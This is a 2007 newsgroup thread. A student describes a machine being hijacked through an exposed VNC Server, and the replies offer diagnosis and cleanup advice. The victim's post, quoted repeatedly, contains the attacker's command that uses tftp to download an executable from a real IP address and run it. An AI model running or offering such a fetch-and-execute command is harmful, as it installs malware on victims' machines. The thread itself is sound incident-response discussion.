Trojan from using VNC Viewer Software

Hey guys. I've bene using the VNC Viewer software to access a Linux
environment at my University's Linux servers.

However, I have over the last few days had a number of occurances of a
Trojan somehow finding its way onto my computer. At some point I would
suddenly lose control of the computer. A Task Manager window would
come up, followed by a run window. In this run window the following
two things are entered:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&

%systemroot%\system32\cmd.exe

In the past I have always been at my computer, so I have been able to
interrupt it by just turning the computer off before it can do that it
is trying to do. Following the last occurance I spent all afternoon
running virus scans and spyware scans using:

AVG Anti virus
AVG anti spyware
Zonealarm Pro's spyware scanner
Spybot Search and Destroy

A Trojan was found (called Generic3.ARX) by AVG and a number of
Spyware items were found and deleted. Satisfied that allw as well, I
opened up the VNC Viewer software and got back to work.

However, today whilst I went away to get a drink the Trojan ran again.
This time I was unable to interrupt it and I came back to find a Task
manager window, a run window and a command prompt all open. Clearly
whatever the Trojan tries to do it has succeeded. I am running both
AVG anti virus and anti spyware scans at the moment but nothing
appears to be coming up this time.

Therefore, what can I do to eradicate whatever this Trojan has done to
my computer? What sort of things would this Trojan do? (or begin doing
as we speak?). Simply stop using VNC Viewer is not an option as I need
it to do my coursework.

I run the latest version of ZoneAlarm Pro along with the other
programmes mentioned above to combat spyware.

Kind regards,

Matt

Matt wrote on 30 Mar 2007 08:55:11 -0700:

> Hey guys. I've bene using the VNC Viewer software to access a Linux
> environment at my University's Linux servers.
>
> However, I have over the last few days had a number of occurances of a
> Trojan somehow finding its way onto my computer. At some point I would
> suddenly lose control of the computer. A Task Manager window would
> come up, followed by a run window. In this run window the following
> two things are entered:
>
> %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
> 64.79.213.12 GET ktqjy.exe & start ktqjy&
>
> %systemroot%\system32\cmd.exe
>
> In the past I have always been at my computer, so I have been able to
> interrupt it by just turning the computer off before it can do that it
> is trying to do. Following the last occurance I spent all afternoon
> running virus scans and spyware scans using:
>
> AVG Anti virus
> AVG anti spyware
> Zonealarm Pro's spyware scanner
> Spybot Search and Destroy
>
> A Trojan was found (called Generic3.ARX) by AVG and a number of
> Spyware items were found and deleted. Satisfied that allw as well, I
> opened up the VNC Viewer software and got back to work.
>
> However, today whilst I went away to get a drink the Trojan ran again.
> This time I was unable to interrupt it and I came back to find a Task
> manager window, a run window and a command prompt all open. Clearly
> whatever the Trojan tries to do it has succeeded. I am running both
> AVG anti virus and anti spyware scans at the moment but nothing
> appears to be coming up this time.
>
> Therefore, what can I do to eradicate whatever this Trojan has done to
> my computer? What sort of things would this Trojan do? (or begin doing
> as we speak?). Simply stop using VNC Viewer is not an option as I need
> it to do my coursework.
>
> I run the latest version of ZoneAlarm Pro along with the other
> programmes mentioned above to combat spyware.
>
> Kind regards,
>
> Matt


This should have nothing to do with the Viewer, are you sure you didn't also
install the Server on your own machine and leave the port open to the
outside world? See http://www.realvnc.com/pipermail/vn...ary/057050.html
for more info, basically someone/something is connecting to the VNC Server
on your machine bypassing the authentication, and then running the commands
(either manually or using a script, most likely using a script). I'm
guessing that when you downloaded and installed VNC Viewer you actually
download the full Client+Server package and installed both, and you allowed
VNC Server to listen in Zone Alarm, probably when it first ran and you
blindly hit the Allow button. Get your machine cleaned and uninstall VNC
Server - you do not need the server component to use the Viewer to access
another machine.

Dan

On Fri, 30 Mar 2007 08:55:11 -0700, Matt wrote:

> Hey guys. I've bene using the VNC Viewer software to access a Linux
> environment at my University's Linux servers.
>
> However, I have over the last few days had a number of occurances of a
> Trojan somehow finding its way onto my computer. At some point I would
> suddenly lose control of the computer. A Task Manager window would
> come up, followed by a run window. In this run window the following
> two things are entered:
>
> %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
> 64.79.213.12 GET ktqjy.exe & start ktqjy&
>
> %systemroot%\system32\cmd.exe
>
> In the past I have always been at my computer, so I have been able to
> interrupt it by just turning the computer off before it can do that it
> is trying to do. Following the last occurance I spent all afternoon
> running virus scans and spyware scans using:
>
> AVG Anti virus
> AVG anti spyware
> Zonealarm Pro's spyware scanner
> Spybot Search and Destroy
>
> A Trojan was found (called Generic3.ARX) by AVG and a number of
> Spyware items were found and deleted. Satisfied that allw as well, I
> opened up the VNC Viewer software and got back to work.
>
> However, today whilst I went away to get a drink the Trojan ran again.
> This time I was unable to interrupt it and I came back to find a Task
> manager window, a run window and a command prompt all open. Clearly
> whatever the Trojan tries to do it has succeeded. I am running both
> AVG anti virus and anti spyware scans at the moment but nothing
> appears to be coming up this time.
>
> Therefore, what can I do to eradicate whatever this Trojan has done to
> my computer? What sort of things would this Trojan do? (or begin doing
> as we speak?). Simply stop using VNC Viewer is not an option as I need
> it to do my coursework.
>
> I run the latest version of ZoneAlarm Pro along with the other
> programmes mentioned above to combat spyware.

First, how do you know it's a trojan STILL on your system?

Did you reset the VNC connection password?

Did you change the default VNC Server port to something other than 5900?

Why is your computer exposed directly to the internet instead of behind a
NAT appliance of some type?



--
Want to know what PCBUTTS1 is really about?
*** WARNING - this links contains foul/pornographic content of an
abusive nature created by PCBUTTS1 and still hosted on his public
website ***
http://www.pcbutts1.com/downloads/leythos.htm

> First, how do you know it's a trojan STILL on your system?

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

> Did you reset the VNC connection password?

I'm using VNC Viewer 4.1.2 (the free one) which has no such option

> Did you change the default VNC Server port to something other than 5900?

Again, I had no such option

> Why is your computer exposed directly to the internet instead of behind a
> NAT appliance of some type?

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt

> This should have nothing to do with the Viewer, are you sure you didn't also
> install the Server on your own machine and leave the port open to the
> outside world? Seehttp://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
> for more info, basically someone/something is connecting to the VNC Server
> on your machine bypassing the authentication, and then running the commands
> (either manually or using a script, most likely using a script). I'm
> guessing that when you downloaded and installed VNC Viewer you actually
> download the full Client+Server package and installed both, and you allowed
> VNC Server to listen in Zone Alarm, probably when it first ran and you
> blindly hit the Allow button. Get your machine cleaned and uninstall VNC
> Server - you do not need the server component to use the Viewer to access
> another machine.

You are absolutely right, I did install the full package and probably
did tell ZoneAlarm to let it have special prividedges. I will
uninstall it right away. The only problem is that I don't think I am
going to be able to "clean" ym computer, because after running all the
scans I mentioend above, none of them came up with anything.

Is their anything I can do aside from reformatting my computer to
ensure I get rid of this?

Kind Regards,

Matt

> First, how do you know it's a trojan STILL on your system?

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

> Did you reset the VNC connection password?

I'm using VNC Viewer 4.1.2 (the free one0 which has no such option

> Did you change the default VNC Server port to something other than 5900?

Again, I had no such option

> Why is your computer exposed directly to the internet instead of behind a
> NAT appliance of some type?

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt

On 30 Mar 2007 10:03:04 -0700, "Matt" <mattb95@hotmail.com> wrote:

>Is their anything I can do aside from reformatting my computer to
>ensure I get rid of this?

Use Autoruns to look for startup programs that you didn't authorize. Look
for any instances of DLL files being loaded on startup that are not
authorized. You can try looking in the System32 directory for recently
modified files, or hidden files that have random names like xzlk.dll, and
send the files found to http://www.virustotal.com/en/indexf.html for
analysis. You could also try running a spyware scanner like Spybot Search
& Destroy or SuperAntiSpyware; the later can detect files based on
characteristics like size, random file names, and other attributes that are
common among trojans and malware.

> Is their anything I can do aside from reformatting my computer to
> ensure I get rid of this?
>

<http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>

On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
> > Is their anything I can do aside from reformatting my computer to
> > ensure I get rid of this?
>
> <http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>

That makes for some interesting reading, looks like a reformat is the
only option.

Thanks to everyone for all the replies.

Kind Regards,

Matt

Matt wrote:
> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
>>> Is their anything I can do aside from reformatting my computer to
>>> ensure I get rid of this?
>> <http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>
>
> That makes for some interesting reading, looks like a reformat is the
> only option.

There are exploits that modify the POST code and BIOS so that even
reformatting may not help :-( Is it time for a new computer???